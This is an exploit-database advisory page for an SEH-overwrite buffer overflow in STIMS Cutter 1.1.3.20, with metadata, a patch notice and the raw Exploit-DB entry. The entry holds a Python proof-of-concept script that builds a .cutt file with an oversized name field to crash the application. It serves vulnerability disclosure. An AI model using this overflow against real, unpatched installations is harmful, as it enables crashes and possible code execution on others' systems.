STIMS CUTTER OVERFLOW SEH OVERWRITE

vendor:

STIMS Cutter

by:

Shantanu Khandelwal

7,8

CVSS

HIGH

SEH Overwrite

119

CWE

Product Name: STIMS Cutter

Affected Version From: 1.1.3.20

Affected Version To: 1.1.3.20

Patch Exists: YES

Related CWE: UNKNOWN

CPE: a:stimslabs:stims_cutter

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2016

STIMS CUTTER OVERFLOW SEH OVERWRITE

STIMS Cutter application is vulnerable to SEH Overwrite vulnerability. The vulnerability can be triggered by making a cutt file and opening it in the STIMS Cutter application. When the user clicks on Build Report, the application crashes due to SEH Overwrite.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE
# Date: 19 Feb 2016
# Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com
<ishitasailor@gmail.com>>
# Vendor Homepage: http://www.stimslabs.com/
# Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe
# Version: 1.1.3.20
# Tested on: Windows XP SP3
# CVE : UNKNOWN
# ==============HOW TO CRASH ==================
#make the cutt file and open it it the STIMS Cutter application.
#Click on Build Report
#===========================================
#Problems in exploitation
#Unable to find suitable SEH pointer
#


#!/usr/bin/env python
f=open("crash.cutt","w")

payload = """<!--block:#solution-->
[solution]
name="""
payload+="A"*8452
payload +="BBBB" #SEH overwrite
payload +="""CCCC
desc=A
time=0
version=1
file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
time.created=131003117142810000
app=1.1.3
projects=1
<!--#solution:block-->
<!--block:A-->
[properties]
optimize=0
level=0
diversity=0
status=0
active=1
remnants=0
sort=0
version=1
desc=S
comment=
comment.active=0
notes=
notes.active=0
material=A
progress=100
calculation=0D99FF12
cost=222.000
time.gone=0
time.date=2016 Feb 18 23.29.14
payload=2
file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
app=1.1.3

[order.blanks]
b001={ "uid": "908113387", "material": "A", "length": "222", "quantity":
"1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id":
"1", "name": "a" }

[order.pieces]
p001={ "uid": "124270241", "material": "A", "length": "111", "quantity":
"1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" }

[layout.summary]
summary={ "output": "112.000", "used.len": "222.000", "used": "1",
"pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1",
"remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu":
"1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone":
"0", "time.date": "2016 Feb 18 23.29.14" }
blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1",
"pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output":
"112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu":
"1.982", "remnants": "0.000" }

[layout.cuttings]
c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
"shifts": "1", "output": "#1 1", "layout": "111" }

[layout.cuttings.parts]
c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
"shifts": "1", "output": "#1 1", "layout": "111", "name": "1" }
<!--A:block-->
"""

f.write(payload)
f.close()